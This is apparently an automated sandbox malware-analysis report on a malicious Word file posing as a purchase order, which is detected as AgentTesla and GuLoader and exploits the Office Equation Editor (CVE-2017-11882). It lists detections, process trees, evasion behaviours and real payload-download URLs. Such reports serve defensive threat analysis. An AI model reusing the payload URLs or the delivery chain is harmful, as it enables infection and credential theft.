Loading ...

Play interactive tourEdit tour

Analysis Report purchase order_2242021.doc

Overview

General Information

Sample Name:purchase order_2242021.doc
Analysis ID:357325
MD5:f0c779ec7573308d5c5bbf15762391d5
SHA1:6934649699360c8cf7a0d8dee37c994082268054
SHA256:fe38000650bb91c8e0d5aee0a0bff8136d849d58dc6f7d9f35d33788abd9a799
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected GuLoader
Connects to a URL shortener service
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Abnormal high CPU Usage
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops PE files to the user directory
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
One or more processes crash
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2276 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2368 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • 69577.exe (PID: 2484 cmdline: C:\Users\Public\69577.exe MD5: 5D2D34449323C67BA1F5EC7561DF2204)
      • RegAsm.exe (PID: 2464 cmdline: C:\Users\Public\69577.exe MD5: 246BB0F8D68A463FD17C235DEB5491C0)
        • dw20.exe (PID: 2248 cmdline: dw20.exe -x -s 1612 MD5: FBA78261A16C65FA44145613E3669E6E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
        Process Memory Space: RegAsm.exe PID: 2464JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: RegAsm.exe PID: 2464JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2368, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2484
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 67.199.248.11, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2368, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2368, TargetFilename: C:\Users\Public\69577.exe
            Sigma detected: Executables Started in Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2368, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2484
            Sigma detected: Execution in Non-Executable FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2368, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2484
            Sigma detected: Suspicious Program Location Process StartsShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2368, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2484

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\PWua8[1].txtReversingLabs: Detection: 12%
            Source: C:\Users\Public\69577.exeReversingLabs: Detection: 12%
            Multi AV Scanner detection for submitted fileShow sources
            Source: purchase order_2242021.docVirustotal: Detection: 43%Perma Link
            Source: purchase order_2242021.docReversingLabs: Detection: 27%

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

            Compliance:

            barindex
            Uses new MSVCR DllsShow sources
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: global trafficDNS query: name: bit.ly
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 5.79.72.163:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 67.199.248.11:80

            Networking:

            barindex
            Connects to a URL shortener serviceShow sources
            Source: unknownDNS query: name: bit.ly
            Source: Joe Sandbox ViewIP Address: 67.199.248.11 67.199.248.11
            Source: Joe Sandbox ViewIP Address: 5.79.72.163 5.79.72.163
            Source: global trafficHTTP traffic detected: GET /3qO7045 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6618253-1CF8-4E74-AA78-05F4F57053A0}.tmpJump to behavior
            Source: global trafficHTTP traffic detected: GET /3qO7045 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: unknownDNS traffic detected: queries for: bit.ly
            Source: RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmpString found in binary or memory: http://JSQBKI.com
            Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: RegAsm.exe, 00000005.00000002.2351532072.0000000000663000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: RegAsm.exe, 00000005.00000002.2351532072.0000000000663000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: RegAsm.exe, 00000005.00000002.2351474503.00000000005BD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: RegAsm.exe, 00000005.00000002.2351812250.0000000002750000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: RegAsm.exe, 00000005.00000002.2351812250.0000000002750000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
            Source: RegAsm.exe, 00000005.00000002.2351532072.0000000000663000.00000004.00000020.sdmpString found in binary or memory: https://cbzrfq.bl.files.1drv.com/
            Source: RegAsm.exe, 00000005.00000002.2351532072.0000000000663000.00000004.00000020.sdmpString found in binary or memory: https://cbzrfq.bl.files.1drv.com/D
            Source: RegAsm.exe, 00000005.00000002.2351532072.0000000000663000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: https://cbzrfq.bl.files.1drv.com/y4mw_bU6RxcRDqG2orF_kxpFaZd0uY1XmxWWfx-XauAPJLaxLYBgtFEfSbIefZC0rnX
            Source: RegAsm.exe, 00000005.00000002.2351474503.00000000005BD000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
            Source: RegAsm.exe, RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000002.2351491082.00000000005D8000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=F57CEB019EB26E7D&resid=F57CEB019EB26E7D%21108&authkey=AN1oxHG
            Source: RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: 3qO7045[1].htm.2.drString found in binary or memory: https://u.teknik.io/PWua8.txt
            Source: RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
            Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

            System Summary:

            barindex
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\PWua8[1].txtJump to dropped file
            Source: C:\Users\Public\69577.exeProcess Stats: CPU usage > 98%
            Source: C:\Users\Public\69577.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Users\Public\69577.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: 76E20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: 76D20000 page execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096AA5 NtProtectVirtualMemory,NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096F2E LoadLibraryA,NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00097007 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00097013 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0009705C NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00097081 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00097097 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_000970B2 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_000970C9 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0009710B NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00097151 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0009717A NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00097190 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_000971A9 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_000971DE NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_000971F7 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0009720F NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096A5F NtProtectVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096A7D NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096A7F NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0009729D NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096ABF NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096AF6 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096B15 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096E84 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096F47 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096F75 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096FA1 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096FBD NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_00096FD8 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0097B0BA NtQuerySystemInformation,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0097B089 NtQuerySystemInformation,
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1612
            Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@8/19@4/2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0097AF3E AdjustTokenPrivileges,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 5_2_0097AF07 AdjustTokenPrivileges,
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$rchase order_2242021.docJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCAAE.tmpJump to behavior
            Source: C:\Users\Public\69577.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: purchase order_2242021.docVirustotal: Detection: 43%
            Source: purchase order_2242021.docReversingLabs: Detection: 27%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknownProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1612
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
            Source: C:\Users\Public\69577.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1612
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
            Source: purchase order_2242021.docStatic file information: File size 1797651 > 1048576
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2464, type: MEMORY
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\PWua8[1].txtJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\PWua8[1].txtJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
